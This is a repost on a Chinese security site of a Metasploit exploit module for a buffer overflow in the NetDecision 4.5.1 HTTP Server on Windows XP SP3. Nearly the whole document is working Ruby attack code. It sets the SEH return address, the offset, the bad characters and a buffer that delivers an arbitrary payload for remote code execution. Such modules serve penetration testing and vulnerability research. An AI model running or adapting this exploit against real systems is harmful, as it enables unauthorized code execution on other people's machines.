首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NetDecision 4.5.1 HTTP Server Buffer Overflow
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2012-03-16  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpClient
 def initialize(info={})
  super(update_info(info,
   'Name'           => "NetDecision 4.5.1 HTTP Server Buffer Overflow",
   'Description'    => %q{
     This module exploits a vulnerability found in NetDecision's HTTP service
    (located in C:\Program Files\NetDecision\Bin\HttpSvr.exe).  By supplying a
    long string of data to the URL, an overflow may occur if the data gets handled
    by HTTP Server's active window.  In other words, in order to gain remote code
    execution, the victim is probably looking at HttpSvr's window.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'Prabhu S Angadi',  #Discovery, DoS PoC
     'sinn3r'            #Metasploit
    ],
   'References'     =>
    [
     ['OSVDB', '79651'],
     ['URL', 'http://secunia.com/advisories/48168/'],
     ['URL', 'http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt']
    ],
   'Payload'        =>
    {
     'BadChars' => "\x00\x09\x0a\x0d\x20\x25\x26\x27\x3f",
     'StackAdjustment' => -3500,
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "seh",
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [
      'NetDecision 4.5.1 on XP SP3',
      {
       # POP/POP/RET - OLEACC.dll
       'Ret'    => 0x74C869E2,
       'Offset' => 1620
      }
     ],
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Feb 24 2012",
   'DefaultTarget'  => 0))
 end
 def check
  res = send_request_cgi({'uri'=>'/'})
  banner = res.headers['Server']
  if banner =~ /NetDecision\-HTTP\-Server\/1\.0/
   return Exploit::CheckCode::Vulnerable
  else
   return Exploit::CheckCode::Safe
  end
 end
 def exploit
  buf = "/"
  buf << rand_text_alpha(675, payload_badchars)
  buf << pattern_create(5) #Avoid TerminateProcess()
  buf << rand_text_alpha(target['Offset']-buf.length, payload_badchars)
  buf << "\xeb\x06" + rand_text_alpha(2, payload_badchars)
  buf << [target.ret].pack('V*')
  buf << payload.encoded
  buf << rand_text_alpha(8000-buf.length, payload_badchars)
  print_status("#{rhost}:#{rport} - Sending #{self.name}...")
  send_request_raw({
   'method' => 'GET',
   'uri'    => buf
  })
  handler
 end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VLC v. 1.1.11 .3gp Memory Corr
·VLC v. 1.1.11 .eac3 DOS
·VLC v. 1.1.11 .m4v Memory Corr
·VLC v. 1.1.11 .nsv DOS
·Bugtraq shutdown modsecurity
·VLC v. 1.1.11 .mxf Memory Corr
·Linux x86_64 - add user with p
·FreeFloat FTP Server TEST Buff
·VLC media player <= 1.1.11 (.f
·WM Downloader Version 3.1.2.2.
·GOM Media Player 2.1.37 Buffer
·WM Downloader Version 3.1.2.2.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved